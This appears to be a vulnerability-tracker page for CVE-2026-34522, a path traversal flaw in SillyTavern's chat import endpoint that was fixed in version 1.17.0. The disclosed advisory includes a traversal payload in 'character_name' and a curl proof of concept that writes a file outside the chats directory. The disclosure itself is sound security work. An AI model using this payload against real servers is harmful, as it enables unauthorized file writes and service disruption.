CVE-2026-34522

HIGH
2026-04-01 https://github.com/SillyTavern/SillyTavern GHSA-xvww-xhx6-22pf
8.1
CVSS 3.1
Share

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
High
Availability
High

Lifecycle Timeline

3
Patch Released
Apr 02, 2026 - 02:30 nvd
Patch available
Analysis Generated
Apr 01, 2026 - 22:16 vuln.today
CVE Published
Apr 01, 2026 - 21:36 nvd
HIGH 8.1

Tags

CSRF Path Traversal

Description

### Summary A path traversal vulnerability in `/api/chats/import` allows an authenticated attacker to write attacker-controlled files outside the intended chats directory by injecting traversal sequences into `character_name`. ### Details `character_name` is used unsafely as part of the destination filename and then passed into `path.join(...)` without sanitization. Evidence: - Import handler entrypoint: <https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/endpoints/chats.js#L680-L686> - Unsanitized `character_name` used in output filename: <https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/endpoints/chats.js#L719-L723> - Same write pattern in JSONL import branch: <https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/endpoints/chats.js#L759-L766> - Endpoint auth context (authenticated user access): <https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/server-main.js#L239> Example payload: - `character_name=../../../../tmp/st_poc` This causes the final destination path to escape from `<user>/chats/<avatar>/...` and write to an attacker-controlled location such as `/tmp/...` (or any writable path for the service account). ### PoC Prerequisites: - Valid authenticated session cookie (`cookie.txt`) - Valid CSRF token (`$TOKEN`) Prepare payload: ```bash printf '{"user_name":"u","chat_metadata":{}}\n{"name":"u","mes":"owned"}\n' >/tmp/poc.jsonl ``` Trigger arbitrary write: ```bash curl -b cookie.txt -H "x-csrf-token: $TOKEN" \ -F "avatar=@/tmp/poc.jsonl" \ -F "file_type=jsonl" \ -F "avatar_url=a.png" \ -F "character_name=../../../../tmp/st_poc" \ -F "user_name=u" \ http://TARGET:8000/api/chats/import ``` Observed result: - A file is created outside chats directory, for example: `/tmp/st_poc - <timestamp> imported.jsonl` ### Impact - Integrity: attacker can create files in unintended filesystem locations. - Availability: can be used for disk abuse and disruptive file placement. - Can become more severe when chained with other local processing behaviors. ### Resolution The issue was addressed in version 1.17.0

Analysis

Authenticated path traversal in SillyTavern's chat import API enables authenticated users to write arbitrary files outside intended directories. Attackers exploit unsanitized 'character_name' parameters in /api/chats/import (versions prior to 1.17.0) to inject traversal sequences (e.g., '../../../../tmp/malicious'), causing file writes to arbitrary filesystem locations accessible to the service account. …

Sign in for full analysis, threat intelligence, and remediation guidance.

Full analysis requires sign-in

Get intelligence summaries, risk assessment, exploit details, threat intel, and remediation guidance.

Sign in - Free

Priority Score

41
Low Medium High Critical
KEV: 0
EPSS: +0.1
CVSS: +40
POC: 0

Share

CVE-2026-34522 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy